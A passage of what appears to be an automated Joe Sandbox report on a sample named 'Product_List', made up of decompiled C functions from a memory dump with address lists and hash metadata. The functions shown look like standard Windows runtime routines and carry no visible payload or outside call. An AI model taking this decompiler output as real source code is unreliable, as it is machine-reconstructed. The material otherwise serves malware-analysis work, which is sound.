				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x183ff00);
				E017BD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1741664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E017AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1741668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E017E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x174166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01792AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L01776600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01792C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								L0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01792AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01792C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01792ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E017BD0D1(_t62);
				goto L28;
			}





















                                                      0x01792990
                                                      0x01792992
                                                      0x01792997
                                                      0x017929a3
                                                      0x017929a6
                                                      0x017929ab
                                                      0x017929ad
                                                      0x017929b2
                                                      0x017d5c80
                                                      0x017929b8
                                                      0x017929b8
                                                      0x017929bb
                                                      0x017929c0
                                                      0x017929c5
                                                      0x017929c6
                                                      0x017929c6
                                                      0x017929cb
                                                      0x00000000
                                                      0x00000000
                                                      0x017929cd
                                                      0x017929d0
                                                      0x017929d9
                                                      0x017929db
                                                      0x017929dd
                                                      0x01792a7f
                                                      0x01792a84
                                                      0x01792a87
                                                      0x01792a89
                                                      0x017d5ca1
                                                      0x017d5ca3
                                                      0x00000000
                                                      0x01792a8f
                                                      0x01792a8f
                                                      0x00000000
                                                      0x01792a8f
                                                      0x00000000
                                                      0x017929e3
                                                      0x017929e3
                                                      0x017929e3
                                                      0x00000000
                                                      0x017929e3
                                                      0x017929dd
                                                      0x00000000
                                                      0x017929db
                                                      0x017929e6
                                                      0x017929e9
                                                      0x017929eb
                                                      0x017929ed
                                                      0x017929f3
                                                      0x017929f5
                                                      0x017929f8
                                                      0x017929fa
                                                      0x01792a97
                                                      0x01792a9a
                                                      0x01792a9d
                                                      0x01792add
                                                      0x00000000
                                                      0x01792a9f
                                                      0x01792aa2
                                                      0x01792aa5
                                                      0x01792aa8
                                                      0x01792aab
                                                      0x017d5cab
                                                      0x017d5caf
                                                      0x017d5cc5
                                                      0x017d5cda
                                                      0x017d5cdc
                                                      0x017d5cdf
                                                      0x017d5ce5
                                                      0x00000000
                                                      0x017d5ceb
                                                      0x017d5ced
                                                      0x017d5cee
                                                      0x00000000
                                                      0x017d5cee
                                                      0x017d5cb1
                                                      0x017d5cb4
                                                      0x017d5cb9
                                                      0x017d5cbb
                                                      0x00000000
                                                      0x017d5cbd
                                                      0x017d5cbd
                                                      0x00000000
                                                      0x017d5cbd
                                                      0x017d5cbb
                                                      0x01792ab1
                                                      0x01792ab1
                                                      0x01792ac4
                                                      0x01792ac6
                                                      0x01792ac6
                                                      0x00000000
                                                      0x01792ac6
                                                      0x01792aab
                                                      0x00000000
                                                      0x01792a00
                                                      0x01792a09
                                                      0x01792a0e
                                                      0x01792a21
                                                      0x01792a24
                                                      0x01792a35
                                                      0x01792a3a
                                                      0x01792a3d
                                                      0x01792a42
                                                      0x01792a59
                                                      0x01792a59
                                                      0x01792a5c
                                                      0x01792a5f
                                                      0x01792a5f
                                                      0x017929fa
                                                      0x017929f3
                                                      0x01792a64
                                                      0x01792a64
                                                      0x01792a6b
                                                      0x01792a6b
                                                      0x01792a6d
                                                      0x01792a72
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e906a3dfbf8e42db305e3fe3b2c94f0307b1618126f7d2a4a621e41fd2a81dee
                                                      • Instruction ID: f3bdebeba0ed458049e496f32be292459f62e0fb0834aa39417da619e7ca7ba2
                                                      • Opcode Fuzzy Hash: e906a3dfbf8e42db305e3fe3b2c94f0307b1618126f7d2a4a621e41fd2a81dee
                                                      • Instruction Fuzzy Hash: AC515B7290020AEFDF25EF59D880ADEFBB5FF58310F148155ED04AB225C7399A56CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01794D3B Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E01794D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x185d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E017AFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1857bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E017AB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01784620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = L0176CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L017AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E017AF380(_t67 + 0xc, 0x1745138, 0x10) == 0) {
								 *0x18560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						L01794F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L01794E70(0x18586b0, 0x1795690, 0, 0) != 0) {
					_t46 = L0176CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                      0x01794d3b
                                                      0x01794d4d
                                                      0x01794d53
                                                      0x01794d58
                                                      0x01794d65
                                                      0x01794d6c
                                                      0x01794d71
                                                      0x01794d77
                                                      0x01794d7f
                                                      0x01794d8c
                                                      0x01794d8e
                                                      0x01794dad
                                                      0x01794db0
                                                      0x01794db7
                                                      0x01794db8
                                                      0x01794db9
                                                      0x01794dba
                                                      0x01794dbb
                                                      0x01794dc1
                                                      0x01794dc8
                                                      0x01794dcc
                                                      0x01794dd5
                                                      0x01794dde
                                                      0x01794ddf
                                                      0x01794de0
                                                      0x01794de1
                                                      0x01794de6
                                                      0x01794de7
                                                      0x01794de9
                                                      0x01794df3
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6c7c
                                                      0x017d6c8a
                                                      0x017d6c8a
                                                      0x017d6c9d
                                                      0x017d6ca7
                                                      0x017d6cac
                                                      0x017d6cb2
                                                      0x017d6cb9
                                                      0x00000000
                                                      0x017d6cbf
                                                      0x017d6cbf
                                                      0x00000000
                                                      0x017d6cbf
                                                      0x017d6cb9
                                                      0x01794dfb
                                                      0x017d6ccf
                                                      0x017d6cd3
                                                      0x01794e32
                                                      0x01794e39
                                                      0x017d6ce0
                                                      0x017d6cf2
                                                      0x017d6cf2
                                                      0x017d6ce0
                                                      0x01794e3f
                                                      0x01794e41
                                                      0x01794e51
                                                      0x01794e51
                                                      0x01794e03
                                                      0x01794e03
                                                      0x01794e09
                                                      0x01794e0f
                                                      0x01794e57
                                                      0x00000000
                                                      0x00000000
                                                      0x01794e1b
                                                      0x01794e30
                                                      0x01794e5b
                                                      0x01794e5b
                                                      0x00000000
                                                      0x01794e30
                                                      0x01794e11
                                                      0x01794e11
                                                      0x01794e16
                                                      0x00000000
                                                      0x01794e16
                                                      0x01794e01
                                                      0x00000000
                                                      0x01794e01
                                                      0x01794da5
                                                      0x017d6c6b
                                                      0x00000000
                                                      0x01794dab
                                                      0x01794dab
                                                      0x00000000
                                                      0x01794dab

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e739e0c4f8abc7bf97aa25f8274a38f1eb75713f59d49e0212139f84b9d4db63
                                                      • Instruction ID: 45a3f2f6940483e4881bef9f64404f21bfd9de247ee8bd0f27b3679ae3369284
                                                      • Opcode Fuzzy Hash: e739e0c4f8abc7bf97aa25f8274a38f1eb75713f59d49e0212139f84b9d4db63
                                                      • Instruction Fuzzy Hash: 3041E271A443189FEF32DF18DD84FAAF7B9EB48610F00009AE94A97285D774ED49CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01794BAD Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E01794BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x185d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0176CC50(_t86);
					L11:
					return L017AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1858504
				E01782280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E017AFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E017AB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01784620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = L0176CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1858504
								L0177FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L01794F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                      0x01794bad
                                                      0x01794bbf
                                                      0x01794bc2
                                                      0x01794bc6
                                                      0x01794bcd
                                                      0x01794bd9
                                                      0x017d67fe
                                                      0x017d6800
                                                      0x01794ccc
                                                      0x01794ccd
                                                      0x01794cb7
                                                      0x01794cc9
                                                      0x01794cc9
                                                      0x01794bdf
                                                      0x01794be5
                                                      0x00000000
                                                      0x00000000
                                                      0x01794beb
                                                      0x01794bef
                                                      0x00000000
                                                      0x00000000
                                                      0x01794bf5
                                                      0x01794bf9
                                                      0x01794c06
                                                      0x01794c0b
                                                      0x01794c17
                                                      0x01794c1c
                                                      0x01794c1f
                                                      0x01794c25
                                                      0x01794c33
                                                      0x01794c3d
                                                      0x01794c40
                                                      0x01794c43
                                                      0x01794c47
                                                      0x01794c4d
                                                      0x01794c53
                                                      0x01794c54
                                                      0x01794c55
                                                      0x01794c56
                                                      0x01794c5b
                                                      0x01794c5c
                                                      0x01794c63
                                                      0x01794c6b
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6776
                                                      0x017d6784
                                                      0x017d6784
                                                      0x017d679f
                                                      0x017d67a7
                                                      0x017d67af
                                                      0x017d67ce
                                                      0x00000000
                                                      0x017d67b1
                                                      0x017d67b7
                                                      0x017d67b8
                                                      0x017d67c1
                                                      0x017d67d3
                                                      0x017d67d9
                                                      0x017d67dd
                                                      0x01794c94
                                                      0x01794c94
                                                      0x01794c98
                                                      0x01794c9c
                                                      0x01794ca3
                                                      0x017d67f4
                                                      0x017d67f4
                                                      0x01794cb5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01794cb5
                                                      0x01794c79
                                                      0x01794c7e
                                                      0x01794c89
                                                      0x01794c8b
                                                      0x01794c8f
                                                      0x01794c8f
                                                      0x00000000
                                                      0x01794c89
                                                      0x017d67c3
                                                      0x00000000
                                                      0x017d67c3
                                                      0x017d67af
                                                      0x01794c73
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed1840bc0b164a9e4077d2cdba4cb59fe48dcf322841d898259d383ec70fa32e
                                                      • Instruction ID: d45a27921d020ef9a30ecd697011d4dcbb56217977909439490890fb566d11ad
                                                      • Opcode Fuzzy Hash: ed1840bc0b164a9e4077d2cdba4cb59fe48dcf322841d898259d383ec70fa32e
                                                      • Instruction Fuzzy Hash: 3A41C031A4022D9FCF21EF68CA44BEAF7B4EF45710F0100A5E909AB245EB349E85CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01778A0A Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E01778A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x185d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L017AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0177E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1741180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01791DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E017A3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01778999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                      0x01778a0a
                                                      0x01778a1c
                                                      0x01778a23
                                                      0x01778a2e
                                                      0x01778a30
                                                      0x01778a36
                                                      0x01778a3c
                                                      0x01778a3e
                                                      0x01778a4a
                                                      0x01778a52
                                                      0x01778a9c
                                                      0x01778aae
                                                      0x01778a58
                                                      0x01778a5e
                                                      0x01778a6a
                                                      0x01778a6f
                                                      0x01778a75
                                                      0x01778a7d
                                                      0x01778a85
                                                      0x01778a86
                                                      0x01778a89
                                                      0x01778a93
                                                      0x01778a99
                                                      0x01778a9b
                                                      0x00000000
                                                      0x01778aaf
                                                      0x01778abe
                                                      0x01778ac3
                                                      0x01778acb
                                                      0x01778ad7
                                                      0x01778ae0
                                                      0x01778af1
                                                      0x00000000
                                                      0x01778af1
                                                      0x01778acd
                                                      0x01778ad5
                                                      0x01778afb
                                                      0x01778afd
                                                      0x01778aff
                                                      0x01778b07
                                                      0x01778b22
                                                      0x01778b24
                                                      0x01778b2a
                                                      0x01778b2e
                                                      0x01778b3f
                                                      0x01778b78
                                                      0x01778b41
                                                      0x01778b52
                                                      0x01778b54
                                                      0x01778b5c
                                                      0x01778b74
                                                      0x01778b74
                                                      0x01778b5c
                                                      0x01778b3f
                                                      0x01778b5e
                                                      0x01778b61
                                                      0x01778b64
                                                      0x01778b64
                                                      0x01778b6c
                                                      0x01778b6c
                                                      0x01778b11
                                                      0x017c9cd5
                                                      0x017c9cd5
                                                      0x01778b17
                                                      0x01778b1a
                                                      0x01778b1a
                                                      0x00000000
                                                      0x01778ad5
                                                      0x01778a89

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63153aa0fbd93af6754117ed1705ca3f534da7ced422ac6db50dee861655e798
                                                      • Instruction ID: 93aba25fa3420c1d8f2dfeac66c8bf16850ca44ec84fbcdf344676f668fc4ae7
                                                      • Opcode Fuzzy Hash: 63153aa0fbd93af6754117ed1705ca3f534da7ced422ac6db50dee861655e798
                                                      • Instruction Fuzzy Hash: E04171B0A402299BDF24DF59CC8CAB9F7B8EB54300F1146EAD91997252E7709E80CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0182FDE2 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0182FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0182FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01830A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01787D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							L01821608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01832B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0182C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0182DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01787D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0182A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                      0x0182fde7
                                                      0x0182fde8
                                                      0x0182fdec
                                                      0x0182fdee
                                                      0x0182fdf5
                                                      0x0182fdf7
                                                      0x0182fdfc
                                                      0x0182fe19
                                                      0x0182fe22
                                                      0x0182fe26
                                                      0x0182fec6
                                                      0x0182fecd
                                                      0x0182fed5
                                                      0x0182fee7
                                                      0x0182fed7
                                                      0x0182fee0
                                                      0x0182fee0
                                                      0x0182feef
                                                      0x0182ff00
                                                      0x0182ff02
                                                      0x0182ff07
                                                      0x0182ff07
                                                      0x00000000
                                                      0x0182feef
                                                      0x0182fe33
                                                      0x0182fe55
                                                      0x0182fe59
                                                      0x0182fe5b
                                                      0x0182fe5e
                                                      0x0182fe69
                                                      0x0182fe6d
                                                      0x0182fe6d
                                                      0x0182fe69
                                                      0x0182fe35
                                                      0x0182fe41
                                                      0x0182fe41
                                                      0x0182fe79
                                                      0x0182fe8b
                                                      0x0182fe7b
                                                      0x0182fe84
                                                      0x0182fe84
                                                      0x0182fe93
                                                      0x00000000
                                                      0x0182fea8
                                                      0x0182feba
                                                      0x00000000
                                                      0x0182feba
                                                      0x0182fdfe
                                                      0x0182fe01
                                                      0x0182fe02
                                                      0x0182fe08
                                                      0x0182ff0c
                                                      0x0182ff14
                                                      0x0182ff14

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction ID: 447208209abbba4fa8bd1e84dd07c2fcb71d912914a925047c6fb8f42eca72ac
                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction Fuzzy Hash: EA311436200655AFD3279B6CC844F6ABBFAEFC5B50F184058E646CB346DA74DE81C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0182EA55 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E0182EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
